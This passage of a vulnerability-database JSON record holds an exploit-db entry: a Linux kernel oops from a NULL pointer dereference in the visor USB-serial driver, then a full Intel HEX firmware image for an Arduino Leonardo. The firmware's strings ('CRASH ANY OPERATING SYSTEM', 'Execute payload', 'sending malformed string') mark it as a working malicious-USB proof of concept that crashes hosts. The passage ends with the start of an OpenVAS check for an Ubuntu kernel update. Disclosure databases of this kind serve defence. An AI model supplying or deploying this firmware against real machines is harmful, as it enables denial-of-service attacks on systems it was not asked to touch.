support registered for Sony Clie 5.0\r\n[ 35.521056] usbserial: USB Serial support registered for Sony Clie 3.5\r\n[ 35.535245] visor 1-1:1.0: Handspring Visor / Palm OS converter detected\r\n[ 35.542409] BUG: unable to handle kernel NULL pointer dereference at \r\n00000000000000b0\r\n[ 35.543244] IP: [<ffffffffa0393651>] treo_attach+0x61/0x340 [visor]\r\n[ 35.543244] PGD 0 \r\n[ 35.543244] Oops: 0002 [#1] SMP \r\n[ 35.543244] Modules linked in: visor(+) ip6t_rpfilter ip6t_REJECT ipt_REJECT \r\nxt_conntrack ebtable_nat ebtable_broute bridge stp llc ebtable_filter ebtables \r\nip6table_nat nf_conntrack_ipv6 nf_defrag_ipv6 nf_nat_ipv6 ip6table_mangle \r\nip6table_security ip6table_raw ip6table_filter ip6_tables iptable_nat \r\nnf_conntrack_ipv4 nf_defrag_ipv4 nf_nat_ipv4 nf_nat nf_conntrack \r\niptable_mangle iptable_security iptable_raw iptable_filter ip_tables bochs_drm \r\nppdev syscopyarea sysfillrect sysimgblt ttm drm_kms_helper drm pcspkr i2c_piix4 \r\ni2c_core serio_raw parport_pc parport xfs libcrc32c sd_mod sr_mod crc_t10dif \r\ncdrom crct10dif_common ata_generic pata_acpi ata_piix libata e1000 floppy \r\ndm_mirror dm_region_hash dm_log dm_mod\r\n[ 35.543244] CPU: 0 PID: 2220 Comm: systemd-udevd Not tainted \r\n3.10.0-229.14.1.el7.x86_64 #1\r\n[ 35.543244] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS \r\nrel-1.8.2-0-g33fbe13 by qemu-project.org 04/01/2014\r\n[ 35.543244] task: ffff88000bcfa220 ti: ffff88000bd20000 task.ti: ffff88000bd20000\r\n[ 35.543244] RIP: 0010:[<ffffffffa0393651>] [<ffffffffa0393651>] \r\ntreo_attach+0x61/0x340 [visor]\r\n[ 35.543244] RSP: 0018:ffff88000bd23a78 EFLAGS: 00010286\r\n[ 35.543244] RAX: ffff88000003c000 RBX: ffff88000af979c0 RCX: 000000000000a0e2\r\n[ 35.543244] RDX: 0000000000000000 RSI: 00000000000000d0 RDI: ffff88000e401400\r\n[ 35.543244] RBP: ffff88000bd23a80 R08: 00000000000164c0 R09: ffff88000e401400\r\n[ 35.543244] R10: ffffffffa0393636 R11: ffff88000bcd0000 R12: 0000000000000404\r\n[ 35.543244] R13: ffff88000be6b000 R14: ffff88000af979c0 R15: ffffffffa0395400\r\n[ 35.543244] FS: 00007fb8082b4880(0000) GS:ffff88000fc00000(0000) \r\nknlGS:0000000000000000\r\n[ 35.543244] CS: 0010 DS: 0000 ES: 0000 CR0: 000000008005003b\r\n[ 35.543244] CR2: 00000000000000b0 CR3: 000000000c51f000 CR4: \r\n00000000000006f0\r\n[ 35.543244] DR0: 0000000000000000 DR1: 0000000000000000 DR2: \r\n0000000000000000\r\n[ 35.543244] DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400\r\n[ 35.543244] Stack:\r\n[ 35.543244] ffff88000bcd0090 ffff88000bd23c18 ffffffff8145fed1 0000000000000007\r\n[ 35.543244] 000000020bd23af8 ffff88000c525830 0000000100000000 ffffffffa0395400\r\n[ 35.543244] 0000010000000001 ffff88000bcd0000 0000000000000100 \r\nffff88000bcd0090\r\n[ 35.543244] Call Trace:\r\n[ 35.543244] [<ffffffff8145fed1>] usb_serial_probe+0xdb1/0x1230\r\n[ 35.543244] [<ffffffff812d649c>] ? ida_get_new_above+0x7c/0x2a0\r\n[ 35.543244] [<ffffffff811aba6a>] ? kmem_cache_alloc+0x1ba/0x1d0\r\n[ 35.543244] [<ffffffff8123e5b2>] ? sysfs_addrm_finish+0x42/0xe0\r\n[ 35.543244] [<ffffffff8123e391>] ? __sysfs_add_one+0x61/0x100\r\n[ 35.543244] [<ffffffff8141dc04>] usb_probe_interface+0x1c4/0x2f0\r\n[ 35.543244] [<ffffffff813d30d7>] driver_probe_device+0x87/0x390\r\n[ 35.543244] [<ffffffff813d34b3>] __driver_attach+0x93/0xa0\r\n[ 35.543244] [<ffffffff813d3420>] ? __device_attach+0x40/0x40\r\n[ 35.543244] [<ffffffff813d0e43>] bus_for_each_dev+0x73/0xc0\r\n[ 35.543244] [<ffffffff813d2b2e>] driver_attach+0x1e/0x20\r\n[ 35.543244] [<ffffffff8145ec4b>] usb_serial_register_drivers+0x29b/0x580\r\n[ 35.543244] [<ffffffffa0398000>] ? 0xffffffffa0397fff\r\n[ 35.543244] [<ffffffffa039801e>] usb_serial_module_init+0x1e/0x1000 [visor]\r\n[ 35.543244] [<ffffffff810020e8>] do_one_initcall+0xb8/0x230\r\n[ 35.543244] [<ffffffff810dd0ee>] load_module+0x133e/0x1b40\r\n[ 35.543244] [<ffffffff812f7d60>] ? ddebug_proc_write+0xf0/0xf0\r\n[ 35.543244] [<ffffffff810d96b3>] ? copy_module_from_fd.isra.42+0x53/0x150\r\n[ 35.543244] [<ffffffff810ddaa6>] SyS_finit_module+0xa6/0xd0\r\n[ 35.543244] [<ffffffff81614389>] system_call_fastpath+0x16/0x1b\r\n[ 35.543244] Code: e1 ba 50 05 00 00 be d0 00 00 00 e8 4a 84 e1 e0 48 85 c0 \r\n0f 84 e1 02 00 00 48 8b 53 20 48 8b 92 b8 01 00 00 48 89 90 b8 01 00 00 <48> \r\n89 82 b0 00 00 00 48 8b 53 20 48 8b 92 a8 01 00 00 48 89 90 \r\n[ 35.543244] RIP [<ffffffffa0393651>] treo_attach+0x61/0x340 [visor]\r\n[ 35.543244] RSP <ffff88000bd23a78>\r\n[ 35.543244] CR2: 00000000000000b0\r\n[ 35.973188] ---[ end trace b239663354a1c556 ]---\r\n[ 35.978862] Kernel panic - not syncing: Fatal exception\r\n[ 35.979835] drm_kms_helper: panic occurred, switching back to text console\r\n\r\nArduino Leonardo Firmware:\r\n\r\n:100000000C94A8000C94C5000C94C5000C94C50079\r\n:100010000C94C5000C94C5000C94C5000C94C5004C\r\n:100020000C94C5000C94C5000C94C4050C942F04CA\r\n:100030000C94C5000C94C5000C94C5000C94C5002C\r\n:100040000C94C5000C94C5000C94C5000C94C5001C\r\n:100050000C94C5000C94C5000C94C5000C940E02C1\r\n:100060000C94C5000C94C5000C94C5000C94C500FC\r\n:100070000C94C5000C94C5000C94C5000C94C500EC\r\n:100080000C94C5000C94C5000C94C5000C94C500DC\r\n:100090000C94C5000C94C5000C94C5000C94C500CC\r\n:1000A0000C94C5000C94C5000C94C5000B030E0302\r\n:1000B000010305032F032F032F03120316031A0353\r\n:1000C000200324032F032A030000000200080E006F\r\n:1000D00000030401000B000000000000000000000D\r\n:1000E00000000000000004080201104080401020C1\r\n:1000F00040804080080204018040201002011080EE\r\n:100100001020404004040404040304050202020217\r\n:1001100004030202020206060606060604040202A0\r\n:100120000204000000002300260029002C002F00FC\r\n:1001300000000000250028002B002E0031000000E8\r\n:100140000000240027002A002D00300000C180811B\r\n:1001500011241FBECFEFDAE0DEBFCDBF15E0A0E077\r\n:10016000B1E0E4EDF3E102C005900D92A436B107D1\r\n:10017000D9F725E0A4E6B5E001C01D92AF37B2077C\r\n:10018000E1F70E94C8000C9404070C940000089545\r\n:10019000CF93DF93CDB7DEB7CD59D1090FB6F89421\r\n:1001A000DEBF0FBECDBF0E94A1020E94C70060E06B\r\n:1001B00083E00E94300361E087E00E94300361E049\r\n:1001C00088E00E9430030E9459067E012AE9E20E6F\r\n:1001D000F11C84E093E0D70111969C938E9389E003\r\n:1001E00094E013969C938E93129782E2E2E1F1E001\r\n:1001F0009E012F5F3F4F6901D90101900D928A95B1\r\n:10020000E1F788E1E4E3F1E0DE01939601900D92DD\r\n:100210008A95E1F782E1ECE4F1E0DE01DB96019002\r\n:100220000D928A95E1F789E0EEE5F1E0DE01A05953\r\n:10023000BF4F01900D928A95E1F72A593F4F99E0FF\r\n:10024000992ED901E92D1D92EA95E9F78E010957FA\r\n:100250001F4F87E0E7E6F1E0D80101900D928A9503\r\n:10026000E1F7BE0160587F4F87E0EEE6F1E0DB0189\r\n:1002700001900D928A95E1F7AE0147585F4F87E0F4\r\n:10028000E5E7F1E0DA0101900D928A95E1F75E0170\r\n:10029000FEE8AF0EB11C86E0ECE7F1E0D50101907D\r\n:1002A0000D928A95E1F7CE01835B9F4FEEE0DC0172\r\n:1002B0001D92EA95E9F7E3E0DC011996EC93D90188\r\n:1002C0009C92F4E01196FC9311971496EC93F9012B\r\n:1002D000DC01292D01900D922A95E1F7FE01EC56E3\r\n:1002E000FF4FDC011B96FC93EE931A971D96BC9270\r\n:1002F000AE921C971183008373836283558344837A\r\n:100300000C5211092CE0F80111922A95E9F721E02D\r\n:10031000D80119962C931997FE01E059FF4F0190CF\r\n:100320000D929A94E1F7F8019387828761E088E063\r\n:100330000E9469038BE492E00E94650688E892E0DF\r\n:100340000E94650687EC92E00E94650686E093E0D5\r\n:100350000E94650682E493E00E9465068FE793E0C1\r\n:100360000E94650684EA93E00E9465068BEE93E0A6\r\n:100370000E94650683E00E949F03892B09F047C015\r\n:100380005E01F3E2AF0EB11C8824839482E1982EC3\r\n:1003900084E194E00E946506BF92AF92DF92CF9213\r\n:1003A000FF92EF921F928F921F930F932DB73EB73C\r\n:1003B000225131090FB6F8943EBF0FBE2DBFADB725\r\n:1003C000BEB71196FE01FB96892D01900D928A957C\r\n:1003D000E1F78DE695E00E94030668E873E180E0AE\r\n:1003E00090E00E947B028DE695E00E944E0660E060\r\n:1003F00087E00E94690368E873E180E090E00E9472\r\n:100400007B020FB6F894DEBF0FBECDBFC1CF6AE04E\r\n:1004100070E080E090E00E947B02ACCF1F920F92D0\r\n:100420000FB60F9211242F933F938F939F93AF9307\r\n:10043000BF938091650590916605A0916705B09185\r\n:1004400068053091640523E0230F2D3720F40196D1\r\n:10045000A11DB11D05C026E8230F0296A11DB11DE7\r\n:10046000209364058093650590936605A0936705C6\r\n:10047000B09368058091690590916A05A0916B051C\r\n:10048000B0916C050196A11DB11D809369059093F3\r\n:100490006A05A0936B05B0936C05BF91AF919F91D6\r\n:1004A0008F913F912F910F900FBE0F901F90189535\r\n:1004B0003FB7F8948091690590916A05A0916B050A\r\n:1004C000B0916C0526B5A89B05C02F3F19F0019689\r\n:1004D000A11DB11D3FBF6627782F892F9A2F620F6C\r\n:1004E000711D811D911D42E0660F771F881F991FA6\r\n:1004F0004A95D1F70895CF92DF92EF92FF92CF9372\r\n:10050000DF936B017C010E945802EB01C114D104FE\r\n:10051000E104F10479F00E9458026C1B7D0B683EE7\r\n:100520007340A0F381E0C81AD108E108F108C8516E\r\n:10053000DC4FECCFDF91CF91FF90EF90DF90CF9029\r\n:100540000895789484B5826084BD84B5816084BD4B\r\n:1005500085B5826085BD85B5816085BDEEE6F0E03C\r\n:10056000808181608083E1E8F0E010828081826098\r\n:100570008083808181608083E0E8F0E08081816019\r\n:100580008083E1E9F0E08081826080838081816006\r\n:100590008083E0E9F0E0808181608083E1ECF0E03D\r\n:1005A000808184608083808182608083808181609B\r\n:1005B0008083E3ECF0E0808181608083E0ECF0E018\r\n:1005C000808182608083E2ECF0E0808181608083C2\r\n:1005D000EAE7F0E0808184608083808182608083AC\r\n:1005E000808181608083808180688083089590E02D\r\n:1005F000FC013197EE30F10590F5EA5AFF4F0C946B\r\n:10060000AB09809180008F7703C0809180008F7D3F\r\n:1006100080938000089584B58F7702C084B58F7D64\r\n:1006200084BD0895809190008F7707C080919000DD\r\n:100630008F7D03C080919000877F80939000089504\r\n:100640008091C0008F7703C08091C0008F7D809320\r\n:10065000C00008958091C200877F8093C2000895F2\r\n:10066000CF93DF9390E0FC01EA51FF4F2491FC010E\r\n:10067000EC5FFE4F8491882349F190E0880F991F29\r\n:10068000FC01E25CFE4FA591B491805D9E4FFC01A0\r\n:10069000C591D4919FB7611108C0F8948C912095B1\r\n:1006A00082238C93888182230AC0623051F4F894AB\r\n:1006B0008C91322F309583238C938881822B888371\r\n:1006C00004C0F8948C91822B8C939FBFDF91CF91C3\r\n:1006D00008950F931F93CF93DF931F92CDB7DEB78B\r\n:1006E000282F30E0F901E853FF4F8491F901EA51D6\r\n:1006F000FF4F1491F901EC5FFE4F04910023C9F004\r\n:10070000882321F069830E94F7026981E02FF0E0DD\r\n:10071000EE0FFF1FE05DFE4FA591B4919FB7F894D7\r\n:100720008C91611103C01095812301C0812B8C93A2\r\n:100730009FBF0F90DF91CF911F910F910895CF939D\r\n:10074000DF93282F30E0F901E853FF4F8491F9013E\r\n:10075000EA51FF4FD491F901EC5FFE4FC491CC23D5\r\n:1007600091F081110E94F702EC2FF0E0EE0FFF1FD5\r\n:10077000EE5DFE4FA591B4912C912D2381E090E088\r\n:1007800021F480E002C080E090E0DF91CF910895F5\r\n:10079000615030F02091F100FC0120830196F8CFE8\r\n:1007A000289884E680937D0508951092E9001092C0\r\n:1007B00071051092700590936F0580936E050895F2\r\n:1007C000FF920F931F93CF93DF93F82E8B01EA01D3\r\n:1007D000BA01C8010E94A606F80120E030E08EEFC1\r\n:1007E0002C173D0791F1F7FE02C0A49101C0A08132\r\n:1007F000609170057091710540916E0550916F0583\r\n:1008000064177507ACF49091E8009570E1F390914E\r\n:10081000E80092FD1CC0A093F100A0917005B0917A\r\n:1008200071051196AF73BB27AB2B11F48093E800D1\r\n:10083000A0917005B09171051196B0937105A093C8\r\n:1008400070052F5F3F4F3196CBCFC90102C08FEFAC\r\n:100850009FEFDF91CF911F910F91FF9008951F920D\r\n:100860000F920FB60F9211246F927F928F929F92E8\r\n:10087000AF92BF92CF92DF92EF92FF920F931F93AE\r\n:100880002F933F934F935F936F937F938F939F9398\r\n:10089000AF93BF93EF93FF93CF93DF93CDB7DEB7C3\r\n:1008A0006297DEBFCDBF1092E9008091E80083FF20\r\n:1008B00046C168E0CE010A960E94C80382EF809389\r\n:1008C000E8009A8597FF05C08091E80080FFFCCF83\r\n:1008D00003C08EEF8093E800892F807609F023C152\r\n:1008E0008B85811105C01092F1001092F10020C19A\r\n:1008F000282F2D7F213009F41BC1853049F48091C8\r\n:10090000E80080FFFCCF8C8580688093E30010C1F5\r\n:10091000863009F0E1C02D8508891989223009F057\r\n:10092000B3C0EC848E2D90E0209173053091740556\r\n:10093000821793070CF09FC00E94D5031F92EF927D\r\n:100940008DE394E09F938F930E9483068CE0E89E52\r\n:1009500070011124E0917505F0917605EE0DFF1DF3\r\n:1009600089E0DE01119601900D928A95E1F7C801A8\r\n:100970000E94D50349E050E0BE016F5F7F4F80E0E9\r\n:100980000E94E0030F900F900F900F90C12CD12C7C\r\n:10099000612C712C33E7A32E34E0B32E4AEA842E67\r\n:1009A00044E0942EE0917505F0917605EE0DFF1D63\r\n:1009B000818590E0681679060CF0BAC07F926F923C\r\n:1009C000BF92AF920E948306E0917505F091760583\r\n:1009D000EE0DFF1D628573856C0D7D1D49E050E0B5\r\n:1009E00080E00E94E0030F900F900F900F9000E0C6\r\n:1009F00010E0E0917505F0917605EE0DFF1D028483\r\n:100A0000F385E02DEC0DFD1D818590E00817190799\r\n:100A10005CF51F930F939F928F920E948306E09143\r\n:100A20007505F0917605EE0DFF1D0284F385E02D2E\r\n:100A3000EC0DFD1DC801880F991FA485B585A80F71\r\n:100A4000B91F4D915C910284F385E02DE80FF91FE9\r\n:100A50006081718180E00E94E0030F5F1F4F0F9063\r\n:100A60000F900F900F90C5CF8FEF681A780A8EE025\r\n:100A7000C80ED11C97CF8FED94E09F938F930E9467\r\n:100A800083060F900F9058C0C8012A8B0E94D5038F\r\n:100A90002A892130C1F0233009F04EC08C851F9285\r\n:100AA0008F9389EF94E09F938F930E94830642E097\r\n:100AB00050E062E871E080E00E94E0030F900F9048\r\n:100AC0000F900F9035C04091000150E060E071E060\r\n:100AD00080E00E94E0032CC0873071F1883021F45F\r\n:100AE00081E08093F10024C0893011F5937021F5E5\r\n:100AF000EDE4F1E081E021E096E38093E9002093CA\r\n:100B0000EB0034913093EC009093ED008F5F3196C1\r\n:100B1000843099F78EE78093EA001092EA008C8582\r\n:100B20008093720505C0888999890E94D50304C005\r\n:100B30008EEF8093E80003C081E28093EB00629621\r\n:100B40000FB6F894DEBF0FBECDBFDF91CF91FF91FE\r\n:100B5000EF91BF91AF919F918F917F916F915F9135\r\n:100B60004F913F912F911F910F91FF90EF90DF9048\r\n:100B7000CF90BF90AF909F908F907F906F900F908D\r\n:100B80000FBE0F901F9018951F920F920FB60F92E5\r\n:100B900011248F939F938091E1001092E10083FFD5\r\n:100BA0000FC01092E90091E09093EB001092EC00DE\r\n:100BB00092E39093ED001092720598E09093F0000C\r\n:100BC00082FF1AC080917E05882339F080917E05CE\r\n:100BD000815080937E05882369F080917D0588236C\r\n:100BE00059F080917D05815080937D05811104C06D\r\n:100BF000289A02C05D9AF1CF9F918F910F900FBEFE\r\n:100C00000F901F901895CF93DF93CDB7DEB782E199\r\n:100C1000FE013596A0E0B1E001900D928A95E1F7D2\r\n:100C20008F89988D9093760580937505898D9A8D1F\r\n:100C300090937405809373058B8D9C8D90937C05A8\r\n:100C400080937B058D8D9E8D90937A058093790599\r\n:100C50008F8D98A1909378058093770510927205F7\r\n:100C600081E08093D70080EA8093D80082E189BD3B\r\n:100C700009B400FEFDCF61E070E080E090E00E94EA\r\n:100C80007B0280E98093D8008CE08093E200109290\r\n:100C9000E000559A209ADF91CF91089581E08093EA\r\n:100CA000E00008959091C80095FFFCCF8093CE009E\r\n:100CB00008951092CD0087E68093CC0088E1809360\r\n:100CC000C9008EE08093CA0008950F931F93CF93BD\r\n:100CD000DF93EC018C01FE0101900020E9F73197D0\r\n:100CE000EC1BFD0BC8018C1B9D0B8E179F0730F46E\r\n:100CF000F80181918F010E945206EDCFDF91CF91D3\r\n:100D00001F910F910895CF93DF93CDB7DEB7DA959A\r\n:100D10000FB6F894DEBF0FBECDBFFE01EB5FFE4FF6\r\n:100D2000419151919F0160E071E0CE0101960E94D6\r\n:100D30000707CE0101960E946506D3950FB6F89479\r\n:100D4000DEBF0FBECDBFDF91CF9108958F929F92EE\r\n:100D5000AF92BF92CF92DF92EF92FF920F931F93C9\r\n:100D6000CF93DF9300D0CDB7DEB75B0122E535E04E\r\n:100D70003F932F9389839A830E9483068981882ECB\r\n:100D80009A81992E0F900F9000E010E08EE5E82EEA\r\n:100D900085E0F82E91E1C92E94E0D92E0A151B05A5\r\n:100DA000E4F4F40181914F0190E09F938F93FF92BF\r\n:100DB000EF920E9483060F5F1F4FC8018F70992723\r\n:100DC0000F900F900F900F90892B41F7DF92CF92E9\r\n:100DD0000E9483060F900F90E1CF81E194E09F93F2\r\n:100DE0008F930E9483060F900F900F900F90DF91CA\r\n:100DF000CF911F910F91FF90EF90DF90CF90BF9018\r\n:100E0000AF909F908F900895F8940C94E809AEE00D\r\n:100E1000B0E0EDE0F7E00C94BF098C01CA0146E0B8\r\n:100E20004C831A83098377FF02C060E070E8615049\r\n:100E300071097E836D83A901BC01CE0101960E94D8\r\n:100E400033074D815E8157FD0AC02F8138854217D7\r\n:100E500053070CF49A01F801E20FF31F10822E964B\r\n:100E6000E4E00C94DB09ACE0B0E0E9E3F7E00C94DB\r\n:100E7000B1097C016B018A01FC0117821682838112\r\n:100E800081FFBDC1CE0101964C01F7019381F601AE\r\n:100E900093FD859193FF81916F01882309F4ABC184\r\n:100EA000853239F493FD859193FF81916F018532ED\r\n:100EB00029F4B70190E00E941B09E7CF512C312C97\r\n:100EC00020E02032A0F48B3269F030F4803259F007\r\n:100ED000833269F420612CC08D3239F0803339F4CB\r\n:100EE000216026C02260246023C0286021C027FD25\r\n:100EF00027C030ED380F3A3078F426FF06C0FAE00C\r\n:100F00005F9E300D1124532E13C08AE0389E300DA1\r\n:100F10001124332E20620CC08E3221F426FD6BC1C9\r\n:100F2000206406C08C3611F4206802C0883641F473\r\n:100F3000F60193FD859193FF81916F018111C1CFDE\r\n:100F4000982F9F7D9554933028F40C5F1F4FFFE33B\r\n:100F5000F9830DC0833631F0833771F0833509F0A2\r\n:100F60005BC022C0F801808189830E5F1F4F44243B\r\n:100F70004394512C540115C03801F2E06F0E711CDE\r\n:100F8000F801A080B18026FF03C0652D70E002C08B\r\n:100F90006FEF7FEFC5012C870E9410092C018301A0\r\n:100FA0002C852F77222E17C03801F2E06F0E711CAE\r\n:100FB000F801A080B18026FF03C0652D70E002C05B\r\n:100FC0006FEF7FEFC5012C870E9405092C012C854E\r\n:100FD0002068222E830123FC1BC0832D90E048163D\r\n:100FE0005906B0F4B70180E290E00E941B093A94E0\r\n:100FF000F4CFF50127FC859127FE81915F01B701B0\r\n:1010000090E00E941B0931103A94F1E04F1A510808\r\n:101010004114510471F7E5C0843611F0893639F571\r\n:10102000F80127FF07C060817181828193810C5F85\r\n:101030001F4F08C060817181882777FD8095982FA8\r\n:101040000E5F1F4F2F76B22E97FF09C090958095A7\r\n:10105000709561957F4F8F4F9F4F2068B22E2AE089\r\n:1010600030E0A4010E944D09A82EA81844C085377D\r\n:1010700029F42F7EB22E2AE030E025C0F22FF97F2E\r\n:10108000BF2E8F36C1F018F4883579F0B4C08037A0\r\n:1010900019F0883721F0AFC02F2F2061B22EB4FE97\r\n:1010A0000DC08B2D8460B82E09C024FF0AC09F2F6D\r\n:1010B0009660B92E06C028E030E005C020E130E09F\r\n:1010C00002C020E132E0F801B7FE07C06081718103\r\n:1010D000828193810C5F1F4F06C06081718180E027\r\n:1010E00090E00E5F1F4FA4010E944D09A82EA81882\r\n:1010F000FB2DFF77BF2EB6FE0BC02B2D2E7FA51428\r\n:1011000050F4B4FE0AC0B2FC08C02B2D2E7E05C0E0\r\n:101110007A2C2B2D03C07A2C01C0752C24FF0DC016\r\n:10112000FE01EA0DF11D8081803311F4297E09C092\r\n:1011300022FF06C07394739404C0822F867809F04E\r\n:10114000739423FD13C020FF06C05A2C731418F4A7\r\n:10115000530C5718732C731468F4B70180E290E0B5\r\n:101160002C870E941B0973942C85F5CF731410F4FF\r\n:10117000371801C0312C24FF12C0B70180E390E082\r\n:101180002C870E941B092C8522FF17C021FF03C05A\r\n:1011900088E590E002C088E790E0B7010CC0822F9C\r\n:1011A000867859F021FD02C080E201C08BE227FD64\r\n:1011B0008DE2B70190E00E941B09A51438F4B70135\r\n:1011C00080E390E00E941B095A94F7CFAA94F4019F\r\n:1011D000EA0DF11D8081B70190E00E941B09A1106A\r\n:1011E000F5CF332009F451CEB70180E290E00E94A0\r\n:1011F0001B093A94F6CFF7018681978102C08FEFE1\r\n:101200009FEF2C96E2E10C94CD09FC010590615012\r\n:1012100070400110D8F7809590958E0F9F1F08950C\r\n:10122000FC016150704001900110D8F780959095B5\r\n:101230008E0F9F1F08950F931F93CF93DF93182F47\r\n:10124000092FEB018B8181FD03C08FEF9FEF20C041\r\n:1012500082FF10C04E815F812C813D814217530770\r\n:101260007CF4E881F9819F012F5F3F4F3983288308\r\n:10127000108306C0E885F985812F0995892B29F708\r\n:101280002E813F812F5F3F4F3F832E83812F902FF1\r\n:10129000DF91CF911F910F910895FA01AA2728306D\r\n:1012A00051F1203181F1E8946F936E7F6E5F7F4F33\r\n:1012B0008F4F9F4FAF4FB1E03ED0B4E03CD0670FAF\r\n:1012C000781F891F9A1FA11D680F791F8A1F911D02\r\n:1012D000A11D6A0F711D811D911DA11D20D009F452\r\n:1012E00068943F912AE0269F11243019305D319394\r\n:1012F000DEF6CF010895462F4770405D4193B3E07D\r\n:101300000FD0C9F7F6CF462F4F70405D4A3318F023\r\n:10131000495D31FD4052419302D0A9F7EACFB4E0D4\r\n:10132000A6959795879577956795BA95C9F700978C\r\n:101330006105710508959B01AC010A2E069457952D\r\n:10134000479537952795BA95C9F7620F731F841F84\r\n:10135000951FA01D0895EE0FFF1F0590F491E02D3D\r\n:1013600009942F923F924F925F926F927F928F9249\r\n:101370009F92AF92BF92CF92DF92EF92FF920F9324\r\n:101380001F93CF93DF93CDB7DEB7CA1BDB0B0FB62E\r\n:10139000F894DEBF0FBECDBF09942A8839884888EB\r\n:1013A0005F846E847D848C849B84AA84B984C88481\r\n:1013B000DF80EE80FD800C811B81AA81B981CE0F78\r\n:1013C000D11D0FB6F894DEBF0FBECDBFED0108955D\r\n:0413D000F894FFCFBF\r\n:1013D4001201000200000040AD0BEFBE000101024B\r\n:1013E4000001220342006100640020004200410029\r\n:1013F40042004500250078002500780025006E0095\r\n:1014040025007000180342004100440020004300FE\r\n:10141400300046004600450045002100120100024C\r\n:10142400000000402D08000200010102030109022E\r\n:10143400270001010000FA0705810304040C0705D5\r\n:10144400010204000C0705820104000C07000700D8\r\n:101454000700480100500072006F006C00690066CC\r\n:101464000069006300000A550000006BFD180A00C3\r\n:10147400809F0AB901312B940A8101128946001315\r\n:10148400000257028B0A5E0AF80A5F01F212010099\r\n:1014940002010000400D055702000101020301B9D9\r\n:1014A4000A0100F80A5F0A810A220342006100640B\r\n:1014B400002000420041004200450025007800253C\r\n:1014C40000780025006E00250070001803420041DA\r\n:1014D400004400200043003000460046004500451B\r\n:1014E40000210012010002010000400D0557020016\r\n:1014F400010102030109040000030100000003F2DA\r\n:101504000AEC0A0902270001010000FA01AB0A09EA\r\n:101514000400000301000000090200202020202014\r\n:101524005F5F5F5F5F5F5F5F2020202020202020BF\r\n:1015340020202020202020202020202020202020A7\r\n:1015440020205F5F5F5F5F205F5F20205F2020209F\r\n:101554002020205F5F0A0D00202020202F205F5FC5\r\n:101564005F5F2F202F5F20205F5F5F5F205F5F5FE3\r\n:101574005F5F20205F5F5F5F5F20202020202F209F\r\n:101584005F5F5F2F2F202F5F285F295F5F5F5F2FD3\r\n:10159400202F5F5F0A0D002020202F202F202020E5\r\n:1015A4002F205F5F205C2F205F5F20602F205F5F14\r\n:1015B400205C2F205F5F5F2F5F5F5F5F205C5F5F5A\r\n:1015C400205C2F205F5F2F202F205F5F5F2F202F55\r\n:1015D4002F5F2F0A0D0020202F202F5F5F5F2F2009\r\n:1015E4002F202F202F202F5F2F202F202F5F2F2001\r\n:1015F400285F5F2020292F5F5F5F2F205F5F2F20F0\r\n:101604002F202F5F2F202F202F5F5F2F202C3C0AAD\r\n:101614000D0020205C5F5F5F5F2F5F2F202F5F2F07\r\n:101624005C5F5F2C5F2F5C5F5F5F5F2F5F5F5F5F5F\r\n:101634002F20202020202F5F5F5F5F2F5C5F5F2FB4\r\n:101644005F2F5C5F5F5F2F5F2F7C5F7C0A0D002044\r\n:101654003C3C2043485241534820414E59204F506E\r\n:1016640045524154494E472053595354454D203E09\r\n:101674003E0A0D00203C3C202863292053657267F4\r\n:10168400656A20536368756D696C6F20323031353B\r\n:101694002C204F70656E536F7572636520536563BC\r\n:1016A40075726974792052616C66205370656E6E30\r\n:1016B4006562657267203E3E0A0D000A3E3E205078\r\n:1016C4007265737320627574746F6E20746F207307\r\n:1016D4007461727420657865637574696F6E2E2EFB\r\n:1016E4002E0A0D005B44454255475D2045786563ED\r\n:1016F400757465207061796C6F616420300A0D0027\r\n:10170400526563762D446174613A0A0D005B444569\r\n:101714004255475D200953656E6420436F6E6669C8\r\n:101724006775726174696F6E44657363726970740E\r\n:101734006F720928696E6465783A2569292E2E2E00\r\n:101744000D0A005B44454255475D200953656E64AC\r\n:1017540020496E74657266616365204465736372C3\r\n:101764006970746F720928696E7465726661636565\r\n:101774003A2569292E2E2E0D0A005B444542554711\r\n:101784005D200953656E6420456E64706F696E74E4\r\n:101794002044657363726970746F720928656E649E\r\n:1017A400706F696E743A2569292E2E2E0D0A005B1E\r\n:1017B40044454255475D203C3C70616E6963206D31\r\n:1017C4006F64653F3E3E0D0A005B44454255475DEC\r\n:1017D4002009203E3E20537472696E67204465736D\r\n:1017E40063726970746F72207265717565737420A9\r\n:1017F4002D2073656E64696E67206D616C666F720F\r\n:101804006D656420737472696E67212073657475E5\r\n:10181400702E7756616C75654C203D3D2025690D11\r\n:101824000A005B48455844554D505D0A0D0025306B\r\n:041834003258200006\r\n:00000001FF", "sourceHref": "https://www.exploit-db.com/raw/39539", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}], "openvas": [{"lastseen": "2019-05-29T18:35:21", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-03-15T00:00:00", "type": "openvas", "title": "Ubuntu Update for linux-lts-wily USN-2930-2", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-2384", "CVE-2016-2782", "CVE-2016-0723", "CVE-2015-8767", "CVE-2015-7566", "CVE-2016-3135", "CVE-2016-3134"], "modified": "2019-03-13T00:00:00", "id": "OPENVAS:1361412562310842693", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842693", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for linux-lts-wily USN-2930-2\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842693\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-03-15 06:37:05 +0100 (Tue, 15 Mar 2016)\");\n script_cve_id(\"CVE-2016-3134\", 